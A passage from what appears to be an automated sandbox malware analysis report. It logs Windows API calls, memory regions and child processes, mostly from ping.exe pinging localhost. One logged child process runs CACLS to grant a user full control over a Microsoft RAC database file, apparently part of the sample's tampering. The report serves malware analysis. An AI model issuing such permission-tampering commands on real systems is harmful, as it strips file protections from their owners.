_Mode=16384) returned 32768 [0157.946] LocalFree (hMem=0x4a29e8) returned 0x0 [0157.946] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0157.946] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0157.946] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0157.946] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0157.947] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0157.947] LocalFree (hMem=0x4a8f68) returned 0x0 [0157.947] Sleep (dwMilliseconds=0x3e8) [0159.007] Icmp6SendEcho2 (in: IcmpHandle=0x4a8b88, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x28f2e8, DestinationAddress=0x2455e0, RequestData=0x4a38c8, RequestSize=0x20, RequestOptions=0x28f298, ReplyBuffer=0x4aec00, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x4aec00) returned 0x1 [0159.016] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f76c, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0159.016] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x28f270, nSize=0x0, Arguments=0x28f26c | out: lpBuffer="\xb8\x51\x4a") returned 0x10 [0159.016] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x4a51b8, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0159.016] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0159.016] _write (in: _FileHandle=1, _Buf=0x4a51b8*, _MaxCharCount=0x10 | out: _Buf=0x4a51b8*) returned 16 [0159.016] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0159.016] LocalFree (hMem=0x4a51b8) returned 0x0 [0159.016] FormatMessageA 
(in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="\xe8\x29\x4a") returned 0x9 [0159.016] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x4a29e8, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0159.016] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0159.016] _write (in: _FileHandle=1, _Buf=0x4a29e8*, _MaxCharCount=0x9 | out: _Buf=0x4a29e8*) returned 9 [0159.016] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0159.016] LocalFree (hMem=0x4a29e8) returned 0x0 [0159.016] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x28f274, nSize=0x0, Arguments=0x28f270 | out: lpBuffer="h\x8fJ") returned 0x2 [0159.017] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x4a8f68, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0159.017] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0159.017] _write (in: _FileHandle=1, _Buf=0x4a8f68*, _MaxCharCount=0x2 | out: _Buf=0x4a8f68*) returned 2 [0159.017] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0159.017] LocalFree (hMem=0x4a8f68) returned 0x0 [0159.017] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x28f238, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0159.017] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x28f208, nSize=0x0, Arguments=0x28f204 | out: lpBuffer="`\x15K") returned 0x58 [0159.017] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 30, Received = 30, Lost = 0 (0% loss),\r\n", lpszDst=0x4b1560, cchDstLength=0x58 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 30, Received = 30, Lost = 0 (0% loss),\r\n") returned 1 [0159.017] 
_setmode (_FileHandle=1, _Mode=32768) returned 16384 [0159.017] _write (in: _FileHandle=1, _Buf=0x4b1560*, _MaxCharCount=0x58 | out: _Buf=0x4b1560*) returned 88 [0159.018] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0159.018] LocalFree (hMem=0x4b1560) returned 0x0 [0159.018] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x28f218, nSize=0x0, Arguments=0x28f214 | out: lpBuffer="p\x15K") returned 0x61 [0159.018] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 7ms, Average = 0ms\r\n", lpszDst=0x4b1570, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 7ms, Average = 0ms\r\n") returned 1 [0159.018] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0159.018] _write (in: _FileHandle=1, _Buf=0x4b1570*, _MaxCharCount=0x61 | out: _Buf=0x4b1570*) returned 97 [0159.019] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0159.019] LocalFree (hMem=0x4b1570) returned 0x0 [0159.019] IcmpCloseHandle (IcmpHandle=0x4a8b88) returned 1 [0159.064] LocalFree (hMem=0x4a38c8) returned 0x0 [0159.064] LocalFree (hMem=0x4aec00) returned 0x0 [0159.064] WSACleanup () returned 0 [0159.083] exit (_Code=0) Thread: id = 108 os_tid = 0xee8 Thread: id = 111 os_tid = 0xf04 Thread: id = 113 os_tid = 0xf10 Process: id = "63" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16900" os_pid = "0xec0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "51" os_parent_pid = "0xdfc" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" 
[0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8793 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8794 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 8795 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 8796 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 8797 start_va = 0xb80000 end_va = 0xb88fff entry_point = 0xb80000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 8798 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8799 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8800 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8801 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 8802 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8813 start_va = 0x10000 end_va = 
0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8814 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8815 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 8816 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 8817 start_va = 0x1c0000 end_va = 0x226fff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8818 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8819 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8820 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8821 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8822 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8823 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 
0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8824 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 104 os_tid = 0xec4 Thread: id = 107 os_tid = 0xee4 Process: id = "64" image_name = "ping.exe" filename = "c:\\windows\\system32\\ping.exe" page_root = "0x7ea16920" os_pid = "0xef4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "60" os_parent_pid = "0xe9c" cmd_line = "ping -n 3 localhost" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8966 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8967 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8968 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8969 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 8970 start_va = 0x240000 end_va = 0x247fff entry_point = 0x240000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\System32\\PING.EXE" (normalized: "c:\\windows\\system32\\ping.exe") Region: id = 8971 start_va = 0x77230000 end_va = 0x7736bfff 
entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8972 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8973 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 8974 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 8975 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8976 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8977 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8978 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8979 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 8980 start_va = 0x6f0000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 8981 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8982 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 
region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 8983 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8984 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8985 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8986 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8987 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8988 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8989 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8990 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8991 start_va = 
0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8992 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8993 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8994 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8995 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8996 start_va = 0x130000 end_va = 0x1f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 8997 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8998 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8999 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 9000 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 9001 start_va = 0xe0000 end_va = 0xe2fff 
entry_point = 0xe0000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\System32\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ping.exe.mui") Region: id = 9002 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 9003 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 9004 start_va = 0x250000 end_va = 0x350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 9005 start_va = 0x700000 end_va = 0x12fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 9006 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 9007 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 9008 start_va = 0x15d0000 end_va = 0x17effff entry_point = 0x0 region_type = private name = "private_0x00000000015d0000" filename = "" Region: id = 9009 start_va = 0x74960000 end_va = 0x74964fff entry_point = 0x74960000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 9010 start_va = 0x74e00000 end_va = 0x74e05fff entry_point = 0x74e00000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 9011 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file 
name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 9012 start_va = 0x17f0000 end_va = 0x19effff entry_point = 0x0 region_type = private name = "private_0x00000000017f0000" filename = "" Region: id = 9141 start_va = 0x610000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9142 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 9143 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 9155 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 9156 start_va = 0x360000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 9160 start_va = 0x1600000 end_va = 0x163ffff entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 9161 start_va = 0x17b0000 end_va = 0x17effff entry_point = 0x0 region_type = private name = "private_0x00000000017b0000" filename = "" Region: id = 9162 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 9175 start_va = 0x5a0000 end_va = 0x5dffff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 9176 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Thread: id = 109 os_tid = 0xef8 [0118.238] GetSystemTimeAsFileTime (in: 
lpSystemTimeAsFileTime=0x12f7f4 | out: lpSystemTimeAsFileTime=0x12f7f4*(dwLowDateTime=0x83b774e0, dwHighDateTime=0x1d440a9)) [0118.238] GetCurrentProcessId () returned 0xef4 [0118.238] GetCurrentThreadId () returned 0xef8 [0118.239] GetTickCount () returned 0x28075 [0118.239] QueryPerformanceCounter (in: lpPerformanceCount=0x12f7ec | out: lpPerformanceCount=0x12f7ec*=17502777277) returned 1 [0118.239] GetModuleHandleA (lpModuleName=0x0) returned 0x240000 [0118.239] __set_app_type (_Type=0x1) [0118.239] __p__fmode () returned 0x76b331f4 [0118.239] __p__commode () returned 0x76b331fc [0118.239] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x242ae1) returned 0x0 [0118.240] __getmainargs (in: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8, _DoWildCard=0, _StartInfo=0x2450e8 | out: _Argc=0x2450d4, _Argv=0x2450dc, _Env=0x2450d8) returned 0 [0118.240] SetThreadUILanguage (LangId=0x0) returned 0x409 [0118.240] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0118.240] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x245440 | out: lpWSAData=0x245440) returned 0 [0118.247] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x12f284 | out: phkResult=0x12f284*=0x58) returned 0x0 [0118.247] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x12f278, lpData=0x12f280, lpcbData=0x12f27c*=0x4 | out: lpType=0x12f278*=0x0, lpData=0x12f280*=0x0, lpcbData=0x12f27c*=0x4) returned 0x2 [0118.247] RegCloseKey (hKey=0x58) returned 0x0 [0118.247] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x12f24c*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x12f274 | out: ppResult=0x12f274*=0x0) returned 11001 [0118.247] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, 
pHints=0x12f24c*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x12f274 | out: ppResult=0x12f274*=0x4246f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x4247b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x4247e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x423a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0118.662] FreeAddrInfoW (pAddrInfo=0x4246f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x4247b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x4247e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x423a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0118.662] Icmp6CreateFile () returned 0x428b40 [0118.838] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x424830 [0118.838] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x42ebb0 [0118.838] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x12f774, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0118.838] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x12f274, nSize=0x0, Arguments=0x12f270 | out: lpBuffer="XHB") returned 0x19 [0118.838] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x424858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0118.838] _setmode 
(_FileHandle=1, _Mode=32768) returned 16384 [0118.839] _write (in: _FileHandle=1, _Buf=0x424858*, _MaxCharCount=0x19 | out: _Buf=0x424858*) returned 25 [0118.839] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.839] LocalFree (hMem=0x424858) returned 0x0 [0118.839] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x12f278, nSize=0x0, Arguments=0x12f274 | out: lpBuffer="XHB") returned 0x18 [0118.839] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x424858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0118.839] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0118.839] _write (in: _FileHandle=1, _Buf=0x424858*, _MaxCharCount=0x18 | out: _Buf=0x424858*) returned 24 [0118.839] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0118.839] LocalFree (hMem=0x424858) returned 0x0 [0118.839] SetConsoleCtrlHandler (HandlerRoutine=0x2417ca, Add=1) returned 1 [0118.839] Icmp6SendEcho2 (in: IcmpHandle=0x428b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x12f2f0, DestinationAddress=0x2455e0, RequestData=0x424830, RequestSize=0x20, RequestOptions=0x12f2a0, ReplyBuffer=0x42ebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x42ebb0) returned 0x1 [0118.841] getnameinfo (in: pSockaddr=0x2455e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x12f774, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0118.841] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x12f278, nSize=0x0, Arguments=0x12f274 | out: lpBuffer=" 